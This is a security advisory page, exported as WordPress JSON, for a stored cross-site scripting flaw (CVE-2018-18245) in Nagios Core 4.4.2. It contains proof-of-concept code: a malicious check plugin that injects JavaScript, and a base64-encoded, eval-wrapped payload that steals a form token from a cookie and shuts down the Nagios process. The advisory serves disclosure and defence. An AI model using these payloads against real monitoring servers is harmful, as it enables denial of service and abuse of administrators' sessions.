{"id":16573,"date":"2021-07-08T10:13:35","date_gmt":"2021-07-08T08:13:35","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0026\/"},"modified":"2021-07-19T14:09:11","modified_gmt":"2021-07-19T12:09:11","slug":"usd-2018-0026","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0026\/","title":{"rendered":"usd-2018-0026"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2018-0026 | Nagios Core\/4.4.2<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2018-0026<\/span>
CVE Number<\/strong>: CVE-2018-18245<\/span>
Affected Product<\/strong>: Nagios Core<\/span>
Affected Version<\/strong>: 4.4.2<\/span>
Vulnerability Type<\/strong>: Cross-Site Scripting (XSS)<\/span>
Security Risk<\/strong>: Medium<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/www.nagios.com<\/a>
Vendor Status<\/strong>: Not fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

A cross-site scripting (XSS) vulnerability has been discovered in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. In order to do this the attacker needs to be able to manipulate the output returned by nagios checks, e.g. by replacing a plugin on one of the monitored endpoints. Execution of the payload then requires that an authenticated user creates an alert summary report which contains the corresponding output.<\/p>\n

Nagios Core is a platform for network and system monitoring. It provides a web application for administrators which displays the current status of the monitored entities. Nagios uses plugins executed by the central server and plugins executed on the monitored endpoints via the NRPE service. An attacker that controls one of those endpoints has the ability to either modify plugin output or to replace the plugins executed on those endpoints. Accordingly, attackers may be able to control what is displayed to authenticated users within the web application. Nagios takes care to properly encode plugin results in most places to prevent XSS attacks. However, in the case of alert summary reports the output is not encoded, enabling attacks against the web application and its users.<\/p>\n

<\/span><\/p>\n

Proof of Concept\u00a0<\/h3>\n

Simple PoC:<\/span>
An attacker that controls one of systems monitored with NRPE replaces the check_load plugin by the following simple bash script:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]#!\/bin\/bash
\nVERSION=1.0
\nVERBOSE=0
\nPROGNAME=`\/usr\/bin\/basename $0`
\nPROGPATH=`echo $0 | \/bin\/sed -e 's,[\\\\\/][^\\\\\/][^\\\\\/]*$,,'`
\n. $PROGPATH\/utils.sh
\necho -n \"alert(document.cookie)\"
\nexitCode=1
\necho -n \"Testoutput\"
\nexit $exitCode<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

As soon as the results of the modified check show up in the nagios web interface the payload should be in place. Note: The check status (exitCode) may need to be changed (to either 1 or 2) to make sure that an alert for the current status will show up in the summary page. When a user now views an alert summary report at \/nagios\/cgi-bin\/summary.cgi and creates a report that contains the manipulated check result the payload will be executed.<\/p>\n

Denial of Service PoC: Nagios Process Shutdown A more interesting attack would be able to shut down the Nagios process on the central server. To achieve this, the following JavaScript code will be used:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]function submitRequest()
\n{
\nvar xhr = new XMLHttpRequest();
\nxhr.open(\"POST\", \"http:\\\/\\\/10.10.10.10\\\/nagios\\\/cgi-bin\\\/cmd.cgi\", true);
\nxhr.setRequestHeader(\"Accept\", \"text\\\/html,application\\\/xhtml+xml,application\\\/xml;q=0.9,*\\\/*;q=0.8\");
\nxhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");
\nxhr.setRequestHeader(\"Content-Type\", \"application\\\/x-www-form-urlencoded\");
\nxhr.withCredentials = true;
\nvar cvalue = document.cookie.substring(10);
\nvar body = \"nagFormId=\"+cvalue;
\nbody+=\"&amp;cmd_typ=14&amp;cmd_mod=2&amp;btnSubmit=Commit\";
\nvar aBody = new Uint8Array(body.length);
\nfor (var i = 0; i &lt; aBody.length; i++)
\naBody[i] = body.charCodeAt(i);
\nxhr.send(new Blob([aBody]));
\n}
\nsubmitRequest();<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n

The above script extracts the HTTP value of the NagFormId cookie and places it into the nagFormId form variable. It then automatically sends a POST request to \/nagios\/cgi-bin\/cmd.cgi with the cmd_typ=14 which causes the Nagios process to shut down. This functionality is available to users under the \u201eProcess Info\u201c navigation item. Note: The POST URL needs to point to the hostname or IP address of the actual Nagios server.<\/p>\n

To prevent issues with semicolons in the JavaScript payload the JavaScript code is encoded with base64, wrapped with an eval() call and placed into the malicious plugin. The full PoC plugin then looks like this:<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]#!\/bin\/bash
\nVERSION=1.0
\nVERBOSE=0
\nPROGNAME=`\/usr\/bin\/basename $0`
\nPROGPATH=`echo $0 | \/bin\/sed -e 's,[\\\\\/][^\\\\\/][^\\\\\/]*$,,'`
\n. $PROGPATH\/utils.sh
\necho -n \"eval(atob('ICBmdW5jdGlvbiBzdWJtaXRSZXF1ZXN0KCkKICAgICAgewoJICAgICAgICAgIHZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKCSAgICAgICAgICB4aHIub3BlbigiUE9TVCIsICJodHRwOlwvXC8xMC4xMC4xMC4xMFwvbmFnaW9zXC9jZ2ktYmluXC9jbWQuY2dpIiwgdHJ1ZSk7CgkgICAgICAgICAgeGhyLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdCIsICJ0ZXh0XC9odG1sLGFwcGxpY2F0aW9uXC94aHRtbCt4bWwsYXBwbGljYXRpb25cL3htbDtxPTAuOSwqXC8qO3E9MC44Iik7CgkgICAgICAgICAgeGhyLnNldFJlcXVlc3RIZWFkZXIoIkFjY2VwdC1MYW5ndWFnZSIsICJlbi1VUyxlbjtxPTAuNSIpOwoJICAgICAgICAgIHhoci5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCAiYXBwbGljYXRpb25cL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOwoJICAgICAgICAgIHhoci53aXRoQ3JlZGVudGlhbHMgPSB0cnVlOwoJICAJdmFyIGN2YWx1ZSA9IGRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcoMTApOwoJICAgICAgICAgIHZhciBib2R5ID0gIm5hZ0Zvcm1JZD0iK2N2YWx1ZTsKCSAgCWJvZHkrPSImY21kX3R5cD0xNCZjbWRfbW9kPTImYnRuU3VibWl0PUNvbW1pdCI7CgkgICAgICAgICAgdmFyIGFCb2R5ID0gbmV3IFVpbnQ4QXJyYXkoYm9keS5sZW5ndGgpOwoJICAgICAgICAgIGZvciAodmFyIGkgPSAwOyBpIDwgYUJvZHkubGVuZ3RoOyBpKyspCgkJICAgICAgICAgICAgYUJvZHlbaV0gPSBib2R5LmNoYXJDb2RlQXQoaSk7IAoJICAgICAgICAgIHhoci5zZW5kKG5ldyBCbG9iKFthQm9keV0pKTsKCSAgICAgICAgfQogICAgICBzdWJtaXRSZXF1ZXN0KCk7Cg=='))\"
\nexitCode=1
\necho -n \"Testoutput\"
\nexit $exitCode<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

Encode output received from nagios plugins.<\/span>
https:\/\/www.owasp.org\/index.php\/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n
    \n
  • 2018-09-11 first contact request via security@nagios.com<\/li>\n
  • 2018-09-12 provided advisory via our secure transfer platform<\/li>\n
  • 2018-10-12 received CVE ID and notified vendor about it<\/li>\n
  • 2018-12-07 Security advisory released<\/li>\n<\/ul>\n

    <\/h3>\n

    Credits<\/h3>\n

    This security vulnerabilities was found by Maximilian Boehner of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n

    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

    usd-2018-0026 | Nagios Core\/4.4.2 Advisory ID: usd-2018-0026CVE Number: CVE-2018-18245Affected Product: Nagios CoreAffected Version: 4.4.2Vulnerability Type: Cross-Site Scripting (XSS)Security Risk: MediumVendor URL: https:\/\/www.nagios.comVendor Status: Not fixed Description A cross-site scripting (XSS) vulnerability has been discovered in Nagios Core. This vulnerability allows attackers to place malicious JavaScript code into the web frontend through manipulation of plugin output. […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16573","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16573"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16573\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}